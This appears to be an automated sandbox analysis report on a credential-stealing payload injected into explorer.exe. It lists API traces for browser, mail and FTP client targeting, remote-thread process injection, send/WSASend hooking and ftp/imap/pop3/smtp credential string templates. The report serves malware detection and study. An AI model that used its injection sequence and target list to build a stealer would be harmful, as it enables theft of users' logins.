1068 c2861 GetProcessHeap RtlAllocateHeap 1034->1068 1036 c210b wsprintfW 1037 c2131 1036->1037 1041 c219e 1037->1041 1069 c2861 GetProcessHeap RtlAllocateHeap 1037->1069 1039 c216b wsprintfW 1039->1041 1040 c225d 1042 c2843 3 API calls 1040->1042 1041->1040 1070 c2861 GetProcessHeap RtlAllocateHeap 1041->1070 1044 c2271 1042->1044 1044->1031 1045 c2843 3 API calls 1044->1045 1045->1031 1046 c21e9 1047 c2256 1046->1047 1071 c2815 VirtualAlloc 1046->1071 1049 c2843 3 API calls 1047->1049 1049->1040 1050 c2243 RtlMoveMemory 1050->1047 1052 c1f69 1051->1052 1053 c22c2 1051->1053 1055 c2861 GetProcessHeap RtlAllocateHeap 1052->1055 
1054 c26e6 2 API calls 1053->1054 1054->1052 1055->1021 1056->1023 1058 c1f96 1057->1058 1058->1026 1058->1032 1060 c2353 1059->1060 1062 c22f2 1059->1062 1060->1034 1061 c22f6 DnsQuery_W 1061->1062 1062->1060 1062->1061 1063 c2335 DnsFree inet_ntoa 1062->1063 1063->1062 1064 c2355 1063->1064 1072 c2861 GetProcessHeap RtlAllocateHeap 1064->1072 1066 c235f 1073 c27e2 lstrlen MultiByteToWideChar 1066->1073 1068->1036 1069->1039 1070->1046 1071->1050 1072->1066 1073->1060 716 c1000 717 c1007 716->717 718 c1010 716->718 720 c1016 717->720 769 c2608 VirtualQuery 720->769 723 c1097 723->718 725 c102c RtlMoveMemory 726 c104d 725->726 727 c1071 NtUnmapViewOfSection GetCurrentProcessId 725->727 806 c2861 GetProcessHeap RtlAllocateHeap 726->806 729 c109e 727->729 730 c1092 727->730 772 c10a4 729->772 730->723 732 c1095 730->732 731 c1052 RtlMoveMemory 731->727 807 c1332 732->807 734 c10a3 736 c2861 GetProcessHeap RtlAllocateHeap 734->736 737 c10cc 736->737 738 c10dc CreateToolhelp32Snapshot 737->738 739 c10f0 Process32First 738->739 740 c1322 Sleep 738->740 741 c110c lstrcmpi 739->741 742 c131b CloseHandle 739->742 740->738 743 c1124 lstrcmpi 741->743 766 c1280 741->766 742->740 744 c1138 lstrcmpi 743->744 743->766 746 c114c lstrcmpi 744->746 744->766 745 c25ad OpenProcess IsWow64Process IsWow64Process CloseHandle 745->766 747 c1160 lstrcmpi 746->747 746->766 749 c1170 lstrcmpi 747->749 747->766 748 c1305 Process32Next 748->741 750 c1319 748->750 751 c1184 lstrcmpi 749->751 749->766 750->742 752 c1198 lstrcmpi 751->752 751->766 753 c11ac lstrcmpi 752->753 752->766 754 c11c0 lstrcmpi 753->754 753->766 755 c11d4 lstrcmpi 754->755 754->766 756 c11e8 lstrcmpi 755->756 755->766 758 c11fc lstrcmpi 756->758 756->766 757 c2608 VirtualQuery 757->766 760 c120c lstrcmpi 758->760 758->766 759 c12ae lstrcmpi 759->766 761 c121c lstrcmpi 760->761 760->766 762 c122c lstrcmpi 761->762 761->766 763 c123c lstrcmpi 762->763 762->766 765 c124c lstrcmpi 763->765 763->766 764 c1819 30 API calls 
764->766 765->766 767 c125c lstrcmpi 765->767 766->745 766->748 766->757 766->759 766->764 767->766 768 c126c lstrcmpi 767->768 768->748 768->766 770 c101e 769->770 770->723 771 c2861 GetProcessHeap RtlAllocateHeap 770->771 771->725 834 c2861 GetProcessHeap RtlAllocateHeap 772->834 774 c10cc 775 c10dc CreateToolhelp32Snapshot 774->775 776 c10f0 Process32First 775->776 777 c1322 Sleep 775->777 778 c110c lstrcmpi 776->778 779 c131b CloseHandle 776->779 777->775 780 c1124 lstrcmpi 778->780 781 c1280 778->781 779->777 780->781 782 c1138 lstrcmpi 780->782 786 c1305 Process32Next 781->786 795 c2608 VirtualQuery 781->795 797 c12ae lstrcmpi 781->797 835 c25ad OpenProcess 781->835 841 c1819 781->841 782->781 784 c114c lstrcmpi 782->784 784->781 785 c1160 lstrcmpi 784->785 785->781 787 c1170 lstrcmpi 785->787 786->778 788 c1319 786->788 787->781 789 c1184 lstrcmpi 787->789 788->779 789->781 790 c1198 lstrcmpi 789->790 790->781 791 c11ac lstrcmpi 790->791 791->781 792 c11c0 lstrcmpi 791->792 792->781 793 c11d4 lstrcmpi 792->793 793->781 794 c11e8 lstrcmpi 793->794 794->781 796 c11fc lstrcmpi 794->796 795->781 796->781 798 c120c lstrcmpi 796->798 797->781 798->781 799 c121c lstrcmpi 798->799 799->781 800 c122c lstrcmpi 799->800 800->781 801 c123c lstrcmpi 800->801 801->781 803 c124c lstrcmpi 801->803 803->781 804 c125c lstrcmpi 803->804 804->781 805 c126c lstrcmpi 804->805 805->781 805->786 806->731 887 c2861 GetProcessHeap RtlAllocateHeap 807->887 809 c1340 GetModuleFileNameA 888 c2861 GetProcessHeap RtlAllocateHeap 809->888 811 c1357 GetCurrentProcessId wsprintfA 889 c263e CryptAcquireContextA 811->889 814 c139c Sleep 894 c24d5 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 814->894 815 c140d 912 c2843 815->912 819 c13ae GetModuleHandleA GetProcAddress 821 c13c9 819->821 822 c13da GetModuleHandleA GetProcAddress 819->822 820 c2843 3 API calls 825 c141b RtlExitUserThread 820->825 902 c1de3 821->902 823 c13f5 822->823 824 c1406 822->824 827 c1de3 

                                                      Callgraph

                                                      • Executed
                                                      • Not Executed
                                                      • Opacity -> Relevance
                                                      • Disassembly available
                                                      [Callgraph rendering (functions 000C1000 through 000C3417) not reproduced in text]

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      [Control-flow graph rendering for function 000C1016 not reproduced in text]
                                                      APIs
                                                        • Part of subcall function 000C2608: VirtualQuery.KERNEL32(000C4434,?,0000001C), ref: 000C2615
                                                        • Part of subcall function 000C2861: GetProcessHeap.KERNEL32(00000008,0000A000,000C10CC), ref: 000C2864
                                                        • Part of subcall function 000C2861: RtlAllocateHeap.NTDLL(00000000), ref: 000C286B
                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 000C1038
                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 000C106B
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 000C1074
                                                      • GetCurrentProcessId.KERNEL32(?,000C1010), ref: 000C107A
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000C10DF
                                                      • Process32First.KERNEL32(00000000,?), ref: 000C10FE
                                                      • lstrcmpi.KERNEL32(?,firefox.exe), ref: 000C111A
                                                      • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 000C112E
                                                      • lstrcmpi.KERNEL32(?,chrome.exe), ref: 000C1142
                                                      • lstrcmpi.KERNEL32(?,opera.exe), ref: 000C1156
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000C1166
                                                      • lstrcmpi.KERNEL32(?,outlook.exe), ref: 000C117A
                                                      • lstrcmpi.KERNEL32(?,thebat.exe), ref: 000C118E
                                                      • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 000C11A2
                                                      • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 000C11B6
                                                      • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 000C11CA
                                                      • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 000C11DE
                                                      • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 000C11F2
                                                      • lstrcmpi.KERNEL32(?,winscp.exe), ref: 000C1206
                                                      • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 000C1216
                                                      • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 000C1226
                                                      • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 000C1236
                                                      • lstrcmpi.KERNEL32(?,263em.exe), ref: 000C1246
                                                      • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 000C1256
                                                      • lstrcmpi.KERNEL32(?,alimail.exe), ref: 000C1266
                                                      • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 000C1276
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000C12B4
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 000C130B
                                                      • CloseHandle.KERNELBASE(00000000), ref: 000C131C
                                                      • Sleep.KERNELBASE(000003E8), ref: 000C1327
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                      • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                      • API String ID: 2555639992-1680033604
                                                      • Opcode ID: 622fcf9bd27b25c97b2a17fb2ef2162854cc26da12bc78b5be0b67476663e74b
                                                      • Instruction ID: 54b6bc8a74e964362036cf5b6869e04bda0f949686daf59f36d080a5539ac7a1
                                                      • Opcode Fuzzy Hash: 622fcf9bd27b25c97b2a17fb2ef2162854cc26da12bc78b5be0b67476663e74b
                                                      • Instruction Fuzzy Hash: E171A231614345ABEB50EBB09C55FEE7BECAF46780B08452DFA40C7092EB79DA058B74

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      [Control-flow graph rendering for function 000C10A4 not reproduced in text]
                                                      APIs
                                                        • Part of subcall function 000C2861: GetProcessHeap.KERNEL32(00000008,0000A000,000C10CC), ref: 000C2864
                                                        • Part of subcall function 000C2861: RtlAllocateHeap.NTDLL(00000000), ref: 000C286B
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000C10DF
                                                      • Process32First.KERNEL32(00000000,?), ref: 000C10FE
                                                      • lstrcmpi.KERNEL32(?,firefox.exe), ref: 000C111A
                                                      • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 000C112E
                                                      • lstrcmpi.KERNEL32(?,chrome.exe), ref: 000C1142
                                                      • lstrcmpi.KERNEL32(?,opera.exe), ref: 000C1156
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000C1166
                                                      • lstrcmpi.KERNEL32(?,outlook.exe), ref: 000C117A
                                                      • lstrcmpi.KERNEL32(?,thebat.exe), ref: 000C118E
                                                      • lstrcmpi.KERNEL32(?,thebat32.exe), ref: 000C11A2
                                                      • lstrcmpi.KERNEL32(?,thebat64.exe), ref: 000C11B6
                                                      • lstrcmpi.KERNEL32(?,thunderbird.exe), ref: 000C11CA
                                                      • lstrcmpi.KERNEL32(?,filezilla.exe), ref: 000C11DE
                                                      • lstrcmpi.KERNEL32(?,smartftp.exe), ref: 000C11F2
                                                      • lstrcmpi.KERNEL32(?,winscp.exe), ref: 000C1206
                                                      • lstrcmpi.KERNEL32(?,flashfxp.exe), ref: 000C1216
                                                      • lstrcmpi.KERNEL32(?,cuteftppro.exe), ref: 000C1226
                                                      • lstrcmpi.KERNEL32(?,mailmaster.exe), ref: 000C1236
                                                      • lstrcmpi.KERNEL32(?,263em.exe), ref: 000C1246
                                                      • lstrcmpi.KERNEL32(?,foxmail.exe), ref: 000C1256
                                                      • lstrcmpi.KERNEL32(?,alimail.exe), ref: 000C1266
                                                      • lstrcmpi.KERNEL32(?,mailchat.exe), ref: 000C1276
                                                      • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 000C12B4
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 000C130B
                                                      • CloseHandle.KERNELBASE(00000000), ref: 000C131C
                                                      • Sleep.KERNELBASE(000003E8), ref: 000C1327
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                      • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                      • API String ID: 3950187957-1680033604
                                                      • Opcode ID: 6fe84fb342beb606166c265e69935f49d22730f4db86aed32df6f4077efd07e7
                                                      • Instruction ID: 06162d223618393fa6c8fe91d79d6bdaf10c44f83c16165dd54d4970907d8ed5
                                                      • Opcode Fuzzy Hash: 6fe84fb342beb606166c265e69935f49d22730f4db86aed32df6f4077efd07e7
                                                      • Instruction Fuzzy Hash: F251A571614345A7EB40EBB18C85FAFBBEC6F46780B04492DFA80C70D2EF64DA058A75

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      [Control-flow graph rendering for function 000C7728 not reproduced in text]
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C6000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C6000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c6000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3b459fe83487325506da812504ff279d912cf47021c592ab2696e7eecfa011e7
                                                      • Instruction ID: eb3607feab7254c5dcdbfa78ba087b045d5656e9aa6ae36a1ecaffe79259ccf0
                                                      • Opcode Fuzzy Hash: 3b459fe83487325506da812504ff279d912cf47021c592ab2696e7eecfa011e7
                                                      • Instruction Fuzzy Hash: 7051E87194C3564FD7224B78CC84BAD7BE0EB52320B29077DD5E9CB3C6EA94580ACB61

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 167 c2861-c2871 GetProcessHeap RtlAllocateHeap
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000A000,000C10CC), ref: 000C2864
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 000C286B
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateProcess
                                                      • String ID:
                                                      • API String ID: 1357844191-0
                                                      • Opcode ID: efe074880906266fbc637112cab0f49a542b48b7148310e68f052a2ed5cadc65
                                                      • Instruction ID: fabd7088274ea5878392692656984166807aa6bd3bc966c638ce349ac8c678d8
                                                      • Opcode Fuzzy Hash: efe074880906266fbc637112cab0f49a542b48b7148310e68f052a2ed5cadc65
                                                      • Instruction Fuzzy Hash: 90A012724202007FFD4017A0AC1DF053A18B740301F1080007109C40608968014C8721

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 000C2608: VirtualQuery.KERNEL32(000C4434,?,0000001C), ref: 000C2615
                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,756F3E2E,microsoftedgecp.exe,?), ref: 000C184E
                                                      • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 000C1889
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000C1919
                                                      • RtlMoveMemory.NTDLL(00000000,000C3428,00000016), ref: 000C1940
                                                      • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 000C1968
                                                      • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 000C1978
                                                      • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 000C1992
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 000C199A
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C19A8
                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000C19AF
                                                      • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 000C19C5
                                                      • GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000C19CC
                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000C19E2
                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000C1A0C
                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000C1A1F
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C1A26
                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 000C1A2D
                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000C1A41
                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 000C1A58
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C1A65
                                                      • CloseHandle.KERNEL32(?), ref: 000C1A6B
                                                      • CloseHandle.KERNEL32(?), ref: 000C1A71
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C1A74
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                      • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                      • API String ID: 1066286714-4141090125
                                                      • Opcode ID: a6ba1d4609ff3c06d8a804dcc6138e8a7f65a91240fa9a5254e3153841d0bee1
                                                      • Instruction ID: cd3e5879ca9d27351b964acb90a976cadfa7936318c72bb99405be818c26c2d8
                                                      • Opcode Fuzzy Hash: a6ba1d4609ff3c06d8a804dcc6138e8a7f65a91240fa9a5254e3153841d0bee1
                                                      • Instruction Fuzzy Hash: 15618B31205304AFE310DF659C84EAFBBECEF8A754F04461DF949D2292DA74DE048BA2

                                                      Control-flow Graph

                                                      APIs
                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000C265A
                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000C2672
                                                      • lstrlen.KERNEL32(?,00000000), ref: 000C267A
                                                      • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000C2685
                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000C269F
                                                      • wsprintfA.USER32 ref: 000C26B6
                                                      • CryptDestroyHash.ADVAPI32(?), ref: 000C26CF
                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 000C26D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                      • String ID: %02X
                                                      • API String ID: 3341110664-436463671
                                                      • Opcode ID: 31bcc4255bfd709aa7cfa5d8d414a08930f501f089af272d391fcf7c25d48962
                                                      • Instruction ID: 1ced2dabd5bde09d24f47223e58c929b0f130381b90d8f82d5c22ed8a991796b
                                                      • Opcode Fuzzy Hash: 31bcc4255bfd709aa7cfa5d8d414a08930f501f089af272d391fcf7c25d48962
                                                      • Instruction Fuzzy Hash: 1E110D72900108BFEB119B95EC88FEEBFBCEB44741F208065F605E2150D7754F559B60

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 000C2861: GetProcessHeap.KERNEL32(00000008,0000A000,000C10CC), ref: 000C2864
                                                        • Part of subcall function 000C2861: RtlAllocateHeap.NTDLL(00000000), ref: 000C286B
                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,000C109E,?,000C1010), ref: 000C134A
                                                      • GetCurrentProcessId.KERNEL32(00000003,?,000C109E,?,000C1010), ref: 000C135B
                                                      • wsprintfA.USER32 ref: 000C1372
                                                        • Part of subcall function 000C263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000C265A
                                                        • Part of subcall function 000C263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000C2672
                                                        • Part of subcall function 000C263E: lstrlen.KERNEL32(?,00000000), ref: 000C267A
                                                        • Part of subcall function 000C263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000C2685
                                                        • Part of subcall function 000C263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000C269F
                                                        • Part of subcall function 000C263E: wsprintfA.USER32 ref: 000C26B6
                                                        • Part of subcall function 000C263E: CryptDestroyHash.ADVAPI32(?), ref: 000C26CF
                                                        • Part of subcall function 000C263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 000C26D9
                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 000C1389
                                                      • GetLastError.KERNEL32 ref: 000C138F
                                                      • Sleep.KERNEL32(000001F4), ref: 000C13A1
                                                        • Part of subcall function 000C24D5: GetCurrentProcessId.KERNEL32 ref: 000C24E7
                                                        • Part of subcall function 000C24D5: GetCurrentThreadId.KERNEL32 ref: 000C24EF
                                                        • Part of subcall function 000C24D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000C24FF
                                                        • Part of subcall function 000C24D5: Thread32First.KERNEL32(00000000,0000001C), ref: 000C250D
                                                        • Part of subcall function 000C24D5: CloseHandle.KERNEL32(00000000), ref: 000C2566
                                                      • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 000C13B8
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000C13BF
                                                      • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 000C13E4
                                                      • GetProcAddress.KERNEL32(00000000), ref: 000C13EB
                                                        • Part of subcall function 000C1DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 000C1E1D
                                                      • RtlExitUserThread.NTDLL(00000000), ref: 000C141D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                      • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                      • API String ID: 706757162-1430290102

                                                      Control-flow Graph
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                                                      • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                                                      • API String ID: 3379139566-1703351401

                                                      Control-flow Graph
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,000C1539,?,?,?,000C144B,?), ref: 000C1763
                                                      • GetProcAddress.KERNEL32(00000000,?,000C1539,?,?,?,000C144B,?), ref: 000C176A
                                                      • RtlZeroMemory.NTDLL(000C4228,00000104), ref: 000C1788
                                                      • RtlZeroMemory.NTDLL(000C4118,00000104), ref: 000C1790
                                                      • RtlZeroMemory.NTDLL(000C4330,00000104), ref: 000C1798
                                                      • RtlZeroMemory.NTDLL(000C4000,00000104), ref: 000C17A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MemoryZero$AddressHandleModuleProc
                                                      • String ID: %s%s%s%s$ntdll.dll$sscanf
                                                      • API String ID: 1490332519-278825019

                                                      Control-flow Graph
                                                      APIs
                                                      • GetCurrentProcessId.KERNEL32 ref: 000C24E7
                                                      • GetCurrentThreadId.KERNEL32 ref: 000C24EF
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000C24FF
                                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 000C250D
                                                      • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 000C252C
                                                      • SuspendThread.KERNEL32(00000000), ref: 000C253C
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C254B
                                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 000C255B
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C2566
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                      • String ID:
                                                      • API String ID: 1467098526-0

                                                      Control-flow Graph
                                                      APIs
                                                        • Part of subcall function 000C2861: GetProcessHeap.KERNEL32(00000008,0000A000,000C10CC), ref: 000C2864
                                                        • Part of subcall function 000C2861: RtlAllocateHeap.NTDLL(00000000), ref: 000C286B
                                                        • Part of subcall function 000C27E2: lstrlen.KERNEL32(000C40DA,?,00000000,00000000,000C1F86,75712B62,000C40DA,00000000), ref: 000C27EA
                                                        • Part of subcall function 000C27E2: MultiByteToWideChar.KERNEL32(00000000,00000000,000C40DA,00000001,00000000,00000000), ref: 000C27FC
                                                        • Part of subcall function 000C2374: RtlZeroMemory.NTDLL(?,00000018), ref: 000C2386
                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 000C1FE2
                                                      • wsprintfW.USER32 ref: 000C211B
                                                      • wsprintfW.USER32 ref: 000C2186
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000C2250
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                      • API String ID: 4204651544-1701262698

                                                      Control-flow Graph
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000400,00000000,?,756F3E2E,?,?,microsoftedgecp.exe,000C1287), ref: 000C25BF
                                                      • IsWow64Process.KERNEL32(000000FF,?), ref: 000C25D1
                                                      • IsWow64Process.KERNEL32(00000000,?), ref: 000C25E4
                                                      • CloseHandle.KERNEL32(00000000), ref: 000C25FA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                      • String ID: microsoftedgecp.exe
                                                      • API String ID: 331459951-1475183003

                                                      Control-flow Graph
                                                      APIs
                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 000C1B4E
                                                      • LoadLibraryA.KERNEL32(?), ref: 000C1B76
                                                      • GetProcAddress.KERNEL32(00000000,-00000002,?,?,00000001,?,00000000), ref: 000C1BA3
                                                      • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 000C1BF4
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_c1000_explorer.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                      • String ID:
                                                      • API String ID: 3827878703-0

                                                      Execution Graph

                                                      Execution Coverage:8.7%
